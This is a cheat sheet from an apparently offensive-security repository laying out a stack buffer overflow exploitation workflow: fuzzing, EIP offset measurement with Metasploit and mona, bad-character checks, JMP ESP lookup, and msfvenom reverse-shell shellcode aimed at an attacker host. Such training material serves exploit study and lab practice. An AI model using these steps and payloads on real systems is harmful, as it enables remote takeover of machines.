killchain-compendium/Exploits/Binaries/Buffer Overflow.md

Buffer Overflow

• Cheat Sheet

Usage

• Fuzz & crash the binary pretty roughly via payload

python -c "print('A' * 3000)

Fuzzing

• python 3 ../fuzzer.py

• python 2 ../fuzzer2.py

Measure Offset

• Use as payload

/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>

• Find content of the payload at EIP and identify exact bufferlength

/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>

msf-pattern_offset -l <bufferlength> -q <EIP>

mona msfpattern -l <bufferlength>

• Fill offset variable in exploit buffer_overflow.py ../buffer_overflow.py

• Execute buffer_overflow.py, EIP should contain BBBB

Find bad characters to input in the buffer

• Execute bad_chars.py and include it as payload. Always excluded is \x00. ../bad_chars.py

• Compare stack if any bad chars block exectuion of the payload following in the next steps.

!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>

Find Jump Point / RoP

• Jump point to ESP (32 bit binary) needs to be found to put it inside EIP

Example: Immunity Debugger using mona on windows machine

!mona modules

!mona jmp -r esp -m <exploitable_bin_from_modules>

• The found address needs to be LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE if x86/amd64

Shellcode as Payload

• Last part is the individual shellcode, put it in the payload variable of buffer_overflow.py

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"

• Prepend NOPs as padding before shellcode